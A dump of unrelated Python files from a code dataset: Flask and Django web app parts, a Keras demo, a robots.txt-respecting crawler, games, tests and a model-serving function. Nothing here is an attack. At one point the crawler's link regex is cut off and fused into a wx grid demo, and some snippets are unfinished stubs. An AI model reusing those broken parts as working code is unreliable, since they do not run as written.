current_identity\n\n# local imports\nfrom flask_todo.models.user import UserModel\nfrom flask_todo.models.task import TaskModel\nfrom flask_todo import db\n\nINCOMING_DATE_FMT = '%d/%m/%Y %H:%M:%S'\n\nclass TaskList(Resource):\n @jwt_required()\n def get(self):\n \"\"\"List all of the tasks for one user.\"\"\"\n username = current_identity\n return {'Tasks': [task.to_dict() for task in username.tasks]}\n\n\nclass CreateTask(Resource):\n @jwt_required()\n def post(self):\n username = current_identity\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=True, help=\"This field cannot be blank!\")\n parser.add_argument('note', required=True, help=\"This field cannot be blank!\")\n parser.add_argument('due-date', help=\"This field cannot be blank!\")\n parser.add_argument('completed', help=\"This field cannot be blank!\")\n data = parser.parse_args()\n try:\n task = TaskModel(name=data['name'], note=data['note'],user=username) \n task.save_to_db()\n return task.to_dict(), 201\n except:\n return {'message': 'Something went wrong.'}, 400\n\n\nclass Task(Resource):\n @jwt_required()\n def get(self, task_id):\n \"\"\"Get the detail for one task if that task belongs to the provided user.\"\"\"\n task = TaskModel.query.filter_by(id=task_id).first()\n current_user_tasks = current_identity.tasks\n if task and task in current_user_tasks:\n return task.to_dict()\n return {'message': 'Task not found'}, 404\n\n def put(self, task_id):\n \"\"\"Update one task if that task belongs to the provided user.\"\"\"\n pass\n\n @jwt_required()\n def delete(self, task_id):\n \"\"\"Delete one task if that task belongs to the provided user.\"\"\"\n task = TaskModel.query.filter_by(id=task_id).first()\n current_user_tasks = current_identity.tasks\n if task and task in current_user_tasks:\n task.delete_from_db()\n return {'message': f'Task {task_id} has been deleted.'}, 201\n return {'message': 'Task not found'}, 404\n","sub_path":"flask_todo/resources/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"146887419","text":"import numpy as np\nimport keras as k\n\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.models import Sequential\nfrom keras.optimizers import SGD\n\n# data\nx_train = np.random.random((1000, 20))\ny_train = k.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)\nx_test = np.random.random((100, 20))\ny_test = k.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)\n\n# model\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=20, activation=\"relu\"))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(64, activation=\"relu\"))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(10, activation=\"softmax\"))\n\nsgd = SGD(lr=0.01, momentum=0.9, nesterov=True)\nmodel.compile(optimizer=sgd, loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\nhistory = model.fit(x_train, y_train, batch_size=50, epochs=2)\nscore = model.evaluate(x_test, y_test, batch_size=50)\nprint(score)\n","sub_path":"test_keras_sequential.py","file_name":"test_keras_sequential.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"8930427","text":"\n\nimport random\n\nMAX_GUESSES = 5\nSTART, END = 1,20\n\ndef get_random_number():\n return random.randint(START,END)\n\n\nclass Game:\n\n def __init__(self):\n\n self._guesses = set()\n self._answer = 
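A small illustration of the label encoding used in the Keras script above: `to_categorical` turns integer class ids into one-hot rows.

```python
# One-hot encoding as used for y_train/y_test above.
import numpy as np
import keras as k

y = k.utils.to_categorical(np.array([1, 3]), num_classes=4)
print(y)  # [[0. 1. 0. 0.]
          #  [0. 0. 0. 1.]]
```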
get_random_number()\n self._win = False\n\n def guess(self):\n guess = input(f\"Guess a number between {START} and {END}: \")\n\n try:\n guess = int(guess)\n except ValueError:\n raise ValueError(\"Should be a number\")\n\n if guess not in range(START, END+1):\n raise ValueError(\"Number not in range\")\n\n if guess in self._guesses:\n raise ValueError(\"Already guessed!\")\n\n self._guesses.add(guess)\n\n return guess\n\n\n def _validate_guess(self,guess):\n\n if guess == self._answer:\n print(f\"{guess} is the correct answer! You win\")\n return True\n else:\n za_duzo_za_malo = \"low\" if guess < self._answer else \"high\"\n print(f\"{guess} is too {za_duzo_za_malo}\")\n return False\n\n @property\n def num_guesses(self):\n return len(self._guesses)\n\n def __call__(self):\n\n while len(self._guesses) < MAX_GUESSES:\n\n try:\n guess = self.guess()\n except ValueError as ve:\n print(ve)\n continue\n win = self._validate_guess(guess)\n\n\n if win:\n guess_str = \"guess\" if self.num_guesses == 1 else \"guesses\"\n print(f'It took you {self.num_guesses} {guess_str}')\n self._win = True\n break\n else:\n print(f\"You lost, here are your wrong guesses: {self._guesses}\")\n print(f\"You guessed {MAX_GUESSES} times, the answer was {self._answer}\")\n \n\n\nif __name__ == \"__main__\":\n gra = Game()\n gra()","sub_path":"4_Pytest_Exercice_Days_10_12/game_November272019.py","file_name":"game_November272019.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"157913259","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'viz'\nurlpatterns = [\n\turl(r'^$', views.viz, name='viz'),\n\turl(r'^viz/$', views.viz_overview, name='viz_overview'),\n\turl(r'^viz/results-bar/$', views.viz_results_bar, name='viz_results_bar'),\n\turl(r'^viz/results-map/$', views.viz_results_map, name='viz_results_map'),\n\turl(r'^viz/results-mapnrw13/$', views.viz_results_mapnrw13, name='viz_results_mapnrw13'),\n\turl(r'^viz/results-mapcanvas/$', views.viz_results_mapcanvas, name='viz_results_mapcanvas'),\n\turl(r'^viz/results-timeseries', views.viz_results_timeseries, name='viz_results_timeseries'),\n\turl(r'^computing/', views.computing, name='computing'),\n\turl(r'^waiting/', views.waiting, name='waiting'),\n\turl(r'^test/', views.test, name='test'),\n\turl(r'^data/nrw13.csv$', views.serve_nrw13_csv, name='serve_nrw13_csv'),\n\turl(r'^api/$', views.api, name='api'),\n\turl(r'^api/result/$', views.api_result, name='api_result'),\n\turl(r'^api/result/nrw13/$', views.api_result_nrw13, name='api_result_nrw13'),\n\turl(r'^api/result/nrw17/$', views.api_result_nrw17, name='api_result_nrw17'),\n\turl(r'^api/base/$', views.api_base_party, name='api_base_party'),\n\turl(r'^api/base/election/$', views.api_base_election, name='api_basedata_election'),\n\turl(r'^api/base/municipality/$', views.api_base_municipality, name='api_base_municipality'),\n\turl(r'^api/base/pollingstation/$', views.api_base_pollingstation, name='api_base_pollingstation'),\n\turl(r'^api/base/list/$', views.api_base_list, name='api_basedata_list'),\n\turl(r'^api/base/party/$', views.api_base_party, name='api_basedata_party'),\n\turl(r'^api/base/list/$', views.api_base_list, name='api_basedata_list'),\n\turl(r'^api/base/state/$', views.api_base_state, name='api_base_state'),\n\turl(r'^api/base/district/$', views.api_base_district, name='api_base_district'),\n\turl(r'^api/base/regionalelectoraldistrict/$', views.api_base_red, 
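Since the guessing game above lives in a pytest exercise folder, a sketch of how `guess()` could be tested without a real console (the import path for `Game` is hypothetical):

```python
# Hedged test sketch: monkeypatch input() to feed an out-of-range value.
import pytest
from game_November272019 import Game  # assumed import path

def test_guess_rejects_out_of_range(monkeypatch):
    game = Game()
    monkeypatch.setattr("builtins.input", lambda prompt: "99")  # outside 1..20
    with pytest.raises(ValueError):
        game.guess()
```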
name='api_base_red'),\n\turl(r'^api/raw/$', views.api_rawdata, name='api_rawdata'),\n\turl(r'^api/geom/$', views.api_geom, name='api_geom'),\n]","sub_path":"src/viz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257193286","text":"from flask import render_template, request, session, url_for, redirect\nfrom application import app\nfrom application.models import user_manager\n\n@app.route('/find_user', methods=['GET', 'POST'])\ndef find_user():\n\tif request.method == 'POST':\n\t\tsearch_string = request.form['search_string']\n\t\tif len(search_string) == 0:\n\t\t\tresult = []\n\t\telse: \n\t\t\tresult = user_manager.get_user_by_username(search_string)\n\t\treturn render_template('find_user_ajax.html', result=result)\n\tme = user_manager.get_user(session['user_id'])\n\treturn render_template('follow.html', me=me)\n\n\n@app.route('/follow/')\ndef follow(followee_id):\n\tuser_manager.add_follow({\n\t\t'follower_id' : session['user_id'],\n\t\t'followee_id' : followee_id\n\t})\n\treturn redirect(url_for('find_user'))\n\n","sub_path":"application/controllers/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358188123","text":"import csv\n\nclass CsvReader():\n\n\tdef __init__(self, filename, sep=',', header=False, skip_top=0, skip_bottom=0):\n\t self.filename = filename\n\t self.sep = sep\n\t self.has_header = header\n\t self.skip_top = skip_top\n\t self.skip_bottom = skip_bottom\n\t self.file = None\n\t self.data = None\n\t self.header = None\n\n\tdef __enter__(self):\n\t try:\n\t self.file = open(self.filename, \"r\")\n\t except:\n\t print(\"file not found\")\n\t return(self)\n\t print(\"Opened\")\n\t \n\t reader = csv.reader(self.file, delimiter = self.sep)\n\t for truc in range(self.skip_top):\n\t next(reader)\n\t if self.has_header:\n\t self.header = next(reader)\n\t self.data = [line for line in reader]\n\t if self.skip_bottom:\n\t self.data = self.data[:-self.skip_bottom]\n\t #check if file is corrupted --> does not work\n\t num = len(self.data[0])\n\t print(num)\n\t for line in self.data:\n\t if len(line) != num:\n\t return(None)\n\t return(self)\n\n\tdef __exit__(self, exc_type, exc_value, exc_traceback):\n\t if self.data != None:\n\t print(\"Closed\")\n\t self.file.close()\n\n\tdef getdata(self):\n return(self.data)\n\n\tdef getheader(self):\n\t return(self.header)\n\nwith CsvReader('bad.csv', header = True, skip_top = 0, skip_bottom = 1) as csv_file:\n data = csv_file.getdata()\n header = csv_file.getheader()\n print(\"header: \\n\" + str(header) + \"\\n\")\n if data:\n for lines in data:\n print(lines)\n","sub_path":"d02/ex03/csvreader.py","file_name":"csvreader.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"365894613","text":"# -----------------------------------------------------------------------------\n# Name: crawler.py\n# Purpose: simple web crawler\n#\n# Author: Bradley Thurston\n# -----------------------------------------------------------------------------\n\"\"\"\nimplement a simple web crawler\n\nUsage: crawler.py seed_url\nseed: absolute url - the crawler will use it as the initial web address\n\"\"\"\n\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport urllib.robotparser\nimport re\nimport 
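The corruption check in `CsvReader.__enter__` above returns `None` from inside the row loop, which makes the `with` target unusable rather than reporting the problem (the author's own comment admits it "does not work"). A sketch of a stricter standalone variant that fails loudly, assuming the same rows-of-fields layout as `self.data`:

```python
def check_rectangular(data):
    """Raise if any row has a different number of fields than the first row."""
    width = len(data[0])
    for lineno, row in enumerate(data, start=1):
        if len(row) != width:
            raise ValueError(
                f"corrupted csv: row {lineno} has {len(row)} fields, expected {width}"
            )

check_rectangular([["a", "b"], ["c", "d"]])  # passes silently
```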
sys\n\nMAX_URLS = 10\n\n\ndef ok_to_crawl(absolute_url):\n \"\"\"\n check if it is OK to crawl the specified absolute url\n\n Polite crawling by checking the robots.txt file for all urls except the\n ones using the file scheme (urls on the local host -- all OK to crawl)\n Skips over mailto: links and javascript: links.\n\n Parameter:\n absolute_url (string): absolute url to crawl\n Returns:\n boolean: True if the scheme is file (it is a local webpage)\n True if successfully read the corresponding robots.txt\n file and determined that user-agent * is allowed to crawl\n False if it is a mailto: link or a javascript: link\n if user-agent * is not allowed to crawl it or\n if it is NOT an absolute url.\n \"\"\"\n if absolute_url.lower().startswith('mailto:'):\n return False\n if absolute_url.lower().startswith('javascript:'):\n return False\n link_obj=urllib.parse.urlparse(absolute_url)\n if link_obj.scheme.lower().startswith('file'):\n return True\n # check if the url given as input is an absolute url\n if not link_obj.scheme or not link_obj.hostname:\n print('Not a valid absolute url: ', absolute_url)\n return False\n #construct the robots.txt url from the scheme and host name\n else:\n robot_url= link_obj.scheme+'://'+link_obj.hostname + '/robots.txt'\n rp = urllib.robotparser.RobotFileParser()\n rp.set_url(robot_url)\n try:\n rp.read()\n except:\n print (\"Error accessing robot file: \", robot_url)\n return False\n else:\n return rp.can_fetch(\"*\", absolute_url)\n\n\ndef crawl(seed_url):\n \"\"\"\n start with the seed_url and crawl up to 10 urls\n\n Parameter:\n seed_url (string) - this is the first url to visit.\n Returns:\n set of strings - set of all the urls visited.\n \"\"\"\n urls_tocrawl = {seed_url} # initialize set of urls to crawl\n urls_visited = set() # initialize set of urls visited\n while urls_tocrawl and len(urls_visited) < MAX_URLS:\n current_url= urls_tocrawl.pop() # get url from the set\n if current_url not in urls_visited: # check if it has been crawled\n page = get_page(current_url)\n if page:\n more_urls = extract_links(current_url, page) # get the links\n urls_tocrawl = urls_tocrawl | more_urls # add them\n urls_visited.add(current_url)\n return urls_visited\n\n\ndef get_page(url):\n \"\"\"\n takes an absolute url as input parameter\n returns a string that contains the web page\n Assume the web page uses utf-8 encoding.\n\n If there is an error opening the url or decoding the content,\n # print a message identifying the url and the error and\n # return an empty string.\n \"\"\"\n\n text = \"\"\n try:\n with urllib.request.urlopen(url) as page:\n text = page.read().decode('UTF-8')\n except urllib.error.URLError as url_error:\n print(\"Error opening url: \", url, url_error)\n except UnicodeDecodeError as decode_error:\n print(\"Error decoding url: \", url, decode_error)\n\n return text\n\n\ndef extract_links(base_url, page):\n \"\"\"\n extract the links contained in the page at the base_url\n Parameters:\n base_url (string): the url currently crawling - web address\n page(string): the content of that url - html\n Returns:\n A set of absolute urls (set of strings) - These are all the urls extracted\n from the current url and converted to absolute urls.\n\n \"\"\"\n url_set = set()\n url_pattern = r'0 and event.KeyCode<255: # a character\n \n v=self.cellbox.GetValue()\n r,c=self.grid.GetGridCursorRow(),self.grid.GetGridCursorCol()\n\n\n if event.KeyCode==13: # return\n self.grid[r,c]=v\n self.grid.SetFocus()\n elif event.KeyCode==27: # escape\n 
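The body of `extract_links` above was mangled in extraction (the href regex and the rest of the crawler file are missing, and the text jumps into an unrelated wx grid demo), so only the general approach can be sketched: match candidate links, then let `urljoin` resolve them against the base url. The regex-free helper below is an assumption about intent, not the original code:

```python
# Hedged reconstruction of the absolutization step only; the original regex was lost.
import urllib.parse

def absolutize(base_url, hrefs):
    return {urllib.parse.urljoin(base_url, href) for href in hrefs}

print(absolutize("http://example.com/a/", ["b.html", "/c.html"]))
# {'http://example.com/a/b.html', 'http://example.com/c.html'}
```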
self.cellbox.SetValue(\"\")\n self.grid.SetFocus()\n\n event.Skip()\n \n\n def CloseWindow(self,event):\n self.Close()\n\n def OnSelectCell(self,event):\n r,c=event.Row,event.Col\n self.cellbox.SetValue(self.grid[r,c])\n event.Skip()\n \n \n\nif __name__==\"__main__\":\n app = Application(MainFrame, title=\"Grid\")\n app.Run()\n","sub_path":"waxy/demos/Grid2.py","file_name":"Grid2.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280074657","text":"#!/home/bespontoff/PycharmProjects/checkio/venv/bin/checkio --domain=py run unfair-dice\n\n# For this task, you'regoingto play a dice game, but first you must prepare for an overwhelming victory. The game itself is very simple. Both players roll a single die and whoever rolls highest scores a point. (On a tie, both players must reroll until someone scores.)\n# \n# These aren't standard dice however. Each player can put any positive number on any side of the die as long as the number of sides match and the total of all the chosen numbers are the same. For example, one player might use a six sided die with the numbers [3, 3, 3, 3, 6, 6] while the other player uses a six sided die with the numbers [4, 4, 4, 4, 4, 4]. The interesting part of this game is that even with the same number of sides and the same total, different dice have different chances of winning. Using the example die, the player with all 4's will win 2/3 of the time.\n# \n# To prepare for this game, you're investigating different ways of picking the numbers. To do this, write a program that will take an opponent's die and output some die which will win against it more than half the time. If no die satisfies the task requirements, return an empty list.\n# \n# Input:An enemy's die as a sorted list of integers, one for each face of the opponent's die.\n# \n# Output:Your die as a list of integers, one for each face of your die or an empty list.\n# \n# Example:\n# \n# \n# winning_die([3, 3, 3, 3, 6, 6]) == [4, 4, 4, 4, 4, 4] # Or [3, 3, 4, 4, 5, 5]\n# winning_die([4, 4, 4, 4, 4, 4]) == [2, 2, 5, 5, 5, 5] # Or [5, 5, 2, 2, 5, 5]\n# winning_die([2, 2, 5, 5, 5, 5]) == [3, 3, 3, 3, 6, 6]\n# winning_die([1, 1, 3]) == [1, 2, 2]\n# winning_die([1, 2, 3, 4, 5, 6]) == [] # Any 6-sided die totaling 21 has a 50/50 chance of winning against the standard die.\n# winning_die([2, 3, 4, 5, 6, 7]) == [1, 1, 3, 7, 7, 8] # This can be beat though.\n# winning_die([1, 2, 3, 4, 5, 6]) == []\n# Preconditions:\n# 3 ≤ len(die) ≤ 10\n# sum(die) ≤ 100\n# min(die) ≥ 1\n# max(die) ≤ 18\n# \n# \n# END_DESC\n\ndef winning_die(enemy_die):\n return []\n\nif __name__ == '__main__':\n #These are only used for self-checking and not necessary for auto-testing\n def check_solution(func, enemy):\n player = func(enemy)\n total = 0\n for p in player:\n for e in enemy:\n if p > e:\n total += 1\n elif p < e:\n total -= 1\n return total > 0\n\n assert check_solution(winning_die, [3, 3, 3, 3, 6, 6]), \"Threes and Sixes\"\n assert check_solution(winning_die, [4, 4, 4, 4, 4, 4]), \"All Fours\"\n assert check_solution(winning_die, [1, 1, 1, 4]), \"Unities and Four\"\n assert winning_die([1, 2, 3, 4, 5, 6]) == [], \"All in row -- No die\"","sub_path":"solutions/Codeship/unfair_dice.py","file_name":"unfair_dice.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595106652","text":"from parliament import Context\nimport logging\nimport 
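The checkio stub above returns `[]` unconditionally and so fails its own asserts. One workable strategy, sketched here as a hedged example, is a random walk over dice that preserve the side count and pip total, returning the first die that outscores the enemy (a heuristic, not guaranteed to find a winning die when one exists):

```python
import random

def score(player, enemy):
    # +1 for each winning face pair, -1 for each losing one
    return sum((p > e) - (p < e) for p in player for e in enemy)

def winning_die(enemy_die, tries=20000):
    n = len(enemy_die)
    die = list(enemy_die)
    for _ in range(tries):
        a, b = random.randrange(n), random.randrange(n)
        if die[a] > 1:            # move one pip from face a to face b
            die[a] -= 1
            die[b] += 1
            if score(die, enemy_die) > 0:
                return sorted(die)
    return []

print(winning_die([3, 3, 3, 3, 6, 6]))  # e.g. a die that beats the enemy, or []
```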
json\n\nfrom model_process import ModelProcessor\n\ndef main(context: Context):\n \"\"\" \n Function template\n The context parameter contains the Flask request object and any\n CloudEvent received with the request.\n \"\"\"\n #\n # Debug output.\n #\n logging.warning(f'')\n logging.warning(f'')\n logging.warning(f'**************************************************************')\n logging.warning(f'************** main() called.')\n\n # helper to process the model\n modelprocessor = ModelProcessor()\n\n # get json data from request or cloud event\n # attempt to get data from HTTP Request or cloud event\n if hasattr(context, \"cloud_event\") and hasattr(context.cloud_event, \"data\"):\n data = context.cloud_event.data\n elif hasattr(context, \"request\"):\n data = json.loads(context.request.get_data())\n else : \n data = context #assume this is from test...\n logging.warning(f'************** data from request: {data}')\n\n #convert to index then creating data frame\n jsondata = json.loads(\"[\" + json.dumps(data) + \"]\") #convert to string first\n raw = modelprocessor.createDataFrame(jsondata)\n logging.warning(f'************** \"[INFO] raw dataframe... {raw}') \n\n # # load pipeline and model \n pipeline, model = modelprocessor.load(pipelinePath = \"pipeline.pkl\", modelPath = \"xgbc_model.pkl\") \n\n # get results\n results = modelprocessor.transformAndPredict(raw, pipeline, model, dropNonBioMarkers = False )\n # there should only be one\n for index, row in results.iterrows():\n issepsis = row[\"issepsis\"]\n\n # return results\n body = { \"issepsis\": int(issepsis) }\n #headers = { \"content-type\": \"application/json\" }\n logging.warning(f'************** \"[INFO] prediction... {body}') \n return { \"issepsis\": int(issepsis) }, 200 \n #return body, 200 , headers\n","sub_path":"serving/fn/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405640215","text":"# coding: utf-8\nfrom unittest import mock\n\nfrom the_tale.amqp_environment import environment\n\nfrom the_tale.common.utils import testcase\nfrom the_tale.common.utils.permissions import sync_group\n\nfrom the_tale.accounts import logic as accounts_logic\n\nfrom the_tale.accounts.personal_messages import tt_api as pm_tt_api\nfrom the_tale.accounts.personal_messages.tests import helpers as pm_helpers\n\nfrom the_tale.accounts.achievements.relations import ACHIEVEMENT_GROUP, ACHIEVEMENT_TYPE\nfrom the_tale.accounts.achievements.prototypes import AchievementPrototype, AccountAchievementsPrototype, GiveAchievementTaskPrototype\n\nfrom the_tale.game.heroes import logic as heroes_logic\n\n\nfrom the_tale.game.logic import create_test_map\n\n\n\nclass AchievementsManagerTests(testcase.TestCase, pm_helpers.Mixin):\n\n def setUp(self):\n super(AchievementsManagerTests, self).setUp()\n\n create_test_map()\n\n self.account_1 = self.accounts_factory.create_account()\n self.account_2 = self.accounts_factory.create_account()\n\n group_edit = sync_group('edit achievement', ['achievements.edit_achievement'])\n\n group_edit.user_set.add(self.account_2._model)\n\n self.achievement_1 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.MONEY, type=ACHIEVEMENT_TYPE.MONEY, barrier=0, points=10,\n caption='achievement_1', description='description_1', approved=True)\n self.achievement_2 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.MONEY, type=ACHIEVEMENT_TYPE.MONEY, barrier=5, points=10,\n caption='achievement_2', 
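The `jsondata` construction in func.py above is a roundabout way of writing `[data]`: serializing a dict and re-parsing it inside brackets just wraps it in a one-element list. A one-line check:

```python
import json

data = {"hr": 92, "temp": 38.1}
assert json.loads("[" + json.dumps(data) + "]") == [data]
```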
description='description_2', approved=False)\n self.achievement_3 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.TIME, type=ACHIEVEMENT_TYPE.DEATHS, barrier=4, points=10,\n caption='achievement_3', description='description_3', approved=True)\n\n\n self.account_achievements_1 = AccountAchievementsPrototype.get_by_account_id(self.account_1.id)\n self.account_achievements_1.achievements.add_achievement(self.achievement_1)\n self.account_achievements_1.save()\n\n self.worker = environment.workers.achievements_manager\n self.worker.initialize()\n\n pm_tt_api.debug_clear_service()\n\n def test_add_achievements__not_tasks(self):\n self.worker.add_achievements()\n self.account_achievements_1.reload()\n self.assertEqual(len(self.account_achievements_1.achievements), 1)\n\n def test_add_achievements(self):\n GiveAchievementTaskPrototype.create(account_id=self.account_1.id, achievement_id=self.achievement_3.id)\n self.assertFalse(self.account_achievements_1.has_achievement(self.achievement_3))\n\n with self.check_new_message(self.account_1.id, [accounts_logic.get_system_user_id()]):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n\n @mock.patch('the_tale.accounts.achievements.storage.AchievementsStorage.verify_achievements', lambda *argv, **kwargs: None)\n def test_add_achievements__all_accounts(self):\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=self.achievement_3.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertFalse(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n hero = heroes_logic.load_hero(account_id=self.account_1.id)\n hero.statistics.change_pve_deaths(self.achievement_3.barrier)\n heroes_logic.save_hero(hero)\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n @mock.patch('the_tale.accounts.achievements.storage.AchievementsStorage.verify_achievements', lambda *argv, **kwargs: None)\n def test_add_achievements__all_accounts__not_remove_already_received_achievements(self):\n self.account_achievements_1.achievements.add_achievement(self.achievement_3)\n self.account_achievements_1.save()\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=self.achievement_3.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(self.achievement_3))\n self.assertFalse(account_achievements_2.has_achievement(self.achievement_3))\n\n 
self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n\n def test_legendary_achievements(self):\n achievement_4 = AchievementPrototype.create(group=ACHIEVEMENT_GROUP.LEGENDS, type=ACHIEVEMENT_TYPE.LEGENDS, barrier=0, points=0,\n caption='achievement_4', description='description_4', approved=True)\n\n self.account_achievements_1.achievements.add_achievement(achievement_4)\n self.account_achievements_1.save()\n\n GiveAchievementTaskPrototype.create(account_id=None, achievement_id=achievement_4.id)\n\n account_achievements_2 = AccountAchievementsPrototype.get_by_account_id(self.account_2.id)\n\n self.assertTrue(self.account_achievements_1.has_achievement(achievement_4))\n self.assertFalse(account_achievements_2.has_achievement(achievement_4))\n\n with self.check_no_messages(self.account_2.id):\n with self.check_no_messages(self.account_1.id):\n self.worker.add_achievements()\n\n self.account_achievements_1.reload()\n account_achievements_2.reload()\n\n self.assertTrue(self.account_achievements_1.has_achievement(achievement_4))\n self.assertFalse(account_achievements_2.has_achievement(achievement_4))\n\n self.assertEqual(GiveAchievementTaskPrototype._db_count(), 0)\n","sub_path":"src/the_tale/the_tale/accounts/achievements/tests/test_achievements_manager.py","file_name":"test_achievements_manager.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"446052044","text":"if __name__ == '__main__':\n\tn = int(input())\n\tarr = [int(x) for x in input().split()]\n\n\tarr.sort(reverse=True)\n\ttemp = arr[0]\n\tfor i in arr:\n\t\tif temp > i:\n\t\t\ttemp =i\n\t\t\tbreak\n\n\tprint (temp)","sub_path":"Hackerrank/Hacker8-SecondLargestNumber.py","file_name":"Hacker8-SecondLargestNumber.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"117028565","text":"from datetime import datetime, timedelta\nimport pandas as pd\nfrom IPython import embed\n\n\ndef split_train_valid_test(args, df, df_inv, inv_dummy_diff,\n test_start_datetime, eval_span):\n test_end_datetime = test_start_datetime + \\\n timedelta(days=eval_span)\n valid_start_datetime = test_start_datetime - \\\n timedelta(days=eval_span)\n valid_end_datetime = test_start_datetime\n train_end_datetime = valid_start_datetime\n\n first_day = df.index[0]\n train_start_datetime = datetime(first_day.year, first_day.month, first_day.day)\n\n df_train_start = df.index.get_loc(train_start_datetime)\n df_train_end = df.index.get_loc(train_end_datetime)\n df_train = df.iloc[df_train_start:df_train_end, :]\n\n df_valid_start = df.index.get_loc(valid_start_datetime)\n df_valid_end = df.index.get_loc(valid_end_datetime)\n df_valid = df.iloc[df_valid_start:df_valid_end, :]\n\n df_test_start = df.index.get_loc(test_start_datetime)\n df_test_end = df.index.get_loc(test_end_datetime)\n df_test = df.iloc[df_test_start:df_test_end, :]\n\n df_train = decimate_nonzero_train_data(df_train, df_test)\n df_train = decimate_past_train_data(args, df_train)\n\n # inverse\n train_inv_start_datetime = train_end_datetime - \\\n timedelta(days=inv_dummy_diff)\n train_inv_end_datetime = train_start_datetime - \\\n timedelta(days=inv_dummy_diff)\n df_inv_start = df_inv.index.get_loc(train_inv_start_datetime)\n df_inv_end = df_inv.index.get_loc(train_inv_end_datetime)\n df_inv_train = df_inv.iloc[df_inv_start:df_inv_end, :]\n df_inv_train = decimate_nonzero_train_data(df_inv_train, 
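The Hackerrank loop above finds the largest value strictly smaller than the maximum of a descending-sorted list. An equivalent expression over distinct values, for comparison (assumes at least two distinct values exist):

```python
arr = [2, 3, 6, 6, 5]
print(sorted(set(arr))[-2])  # 5, same answer as the loop
```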
df_test)\n df_inv_train = decimate_past_train_data(args, df_inv_train)\n df_train = pd.concat([df_inv_train, df_train])\n\n df_train = df_train.sample(frac=1, random_state=42)\n X_train = df_train.iloc[:, :-1]\n y_train = df_train.iloc[:, -1]\n\n X_valid = df_valid.iloc[:, :-1]\n y_valid = df_valid.iloc[:, -1]\n\n X_test = df_test.iloc[:, :-1]\n y_test = df_test.iloc[:, -1]\n\n return X_train, X_valid, X_test, y_train, y_valid, y_test\n\n\ndef decimate_nonzero_train_data(df_train, df_test):\n df_test_zero = df_test[df_test['adf flag'] == 0]\n df_test_one = df_test[df_test['adf flag'] == 1]\n df_test_two = df_test[df_test['adf flag'] == 2]\n test_frac_one_by_zero = df_test_one.shape[0] / df_test_zero.shape[0]\n test_frac_two_by_zero = df_test_two.shape[0] / df_test_zero.shape[0]\n\n df_train_zero = df_train[df_train['adf flag'] == 0]\n df_train_one = df_train[df_train['adf flag'] == 1]\n df_train_two = df_train[df_train['adf flag'] == 2]\n train_frac_one_by_zero = df_train_one.shape[0] / df_train_zero.shape[0]\n train_frac_two_by_zero = df_train_two.shape[0] / df_train_zero.shape[0]\n\n if train_frac_one_by_zero > test_frac_one_by_zero:\n print('======== decimate one')\n print('test: {}'.format(test_frac_one_by_zero))\n print('train: {}'.format(train_frac_one_by_zero))\n frac = test_frac_one_by_zero / train_frac_one_by_zero\n df_train_one = df_train_one.sample(frac=frac, random_state=42)\n\n if 